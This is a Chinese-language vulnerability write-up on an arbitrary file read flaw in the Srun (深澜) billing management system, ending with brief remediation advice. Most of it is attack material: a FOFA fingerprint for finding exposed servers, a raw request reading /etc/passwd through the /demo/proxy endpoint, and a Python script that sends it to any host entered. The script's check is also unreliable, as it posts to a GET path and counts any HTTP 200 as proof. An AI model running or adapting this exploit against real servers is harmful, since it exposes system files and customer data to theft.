声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、产品介绍
深澜计费管理系统是一个全面的软件解决方案,旨在帮助企业管理其计费和发票流程。它提供了一套全面的功能,可简化计费任务,提高准确性并优化收入管理。
二、漏洞描述
深澜计费管理系统 存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
三、fofa语法
body="/js/lib/slimscroll.js"
四、漏洞复现
数据包
GET /demo/proxy?url=file:/etc/passwd HTTP/1.1
Host:
Cookie: PHPSESSID_8080=87ec2bc21de8eecd0c2900c64668e6c5; _csrf-8080=86392f41a3f1a3ba307e96dff637541c39c5178238b6040b4dbe90c1d76d965aa%3A2%3A%7Bi%3A0%3Bs%3A10%3A%22_csrf-8080%22%3Bi%3A1%3Bs%3A32%3A%22YiijCQJElD_WfU2pybZxSFOKr8on_wu8%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
五、python检测脚本
import requests
def verify(ip):
url = f'{ip}/demo/proxy?url=file:/etc/passwd'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Cookie': 'PHPSESSID_8080=87ec2bc21de8eecd0c2900c64668e6c5; _csrf-8080=86392f41a3f1a3ba307e96dff637541c39c5178238b6040b4dbe90c1d76d965aa%3A2%3A%7Bi%3A0%3Bs%3A10%3A%22_csrf-8080%22%3Bi%3A1%3Bs%3A32%3A%22YiijCQJElD_WfU2pybZxSFOKr8on_wu8%22%3B%7D'
}
try:
response = requests.post(url, headers=headers,verify=False)
# 验证成功输出相关信息
if response.status_code == 200 :
print(f"{ip}深澜计费管理系统存在任意文件读取!!!")
except Exception as e:
pass
if __name__ == '__main__':
self = input('请输入目标主机IP地址:')
verify(self)
这里的报错原因为目标站点为HTTPS,SSL认证需要导入证书,比较麻烦
六、修复建议
- 关闭互联网暴露面:
- 确保深澜计费管理系统的相关接口(如
/demo/proxy
或/user/group/down-load
)不对互联网直接开放。这些接口如果被恶意用户访问,可能会利用任意文件读取漏洞来窃取敏感信息。 - 评估并限制哪些IP地址或网络段可以访问这些接口,仅允许必要的内部网络或受信任的用户访问。
- 确保深澜计费管理系统的相关接口(如
- 设置接口访问权限:
- 对深澜计费管理系统的接口实施严格的访问控制策略,确保只有经过身份验证和授权的用户才能访问。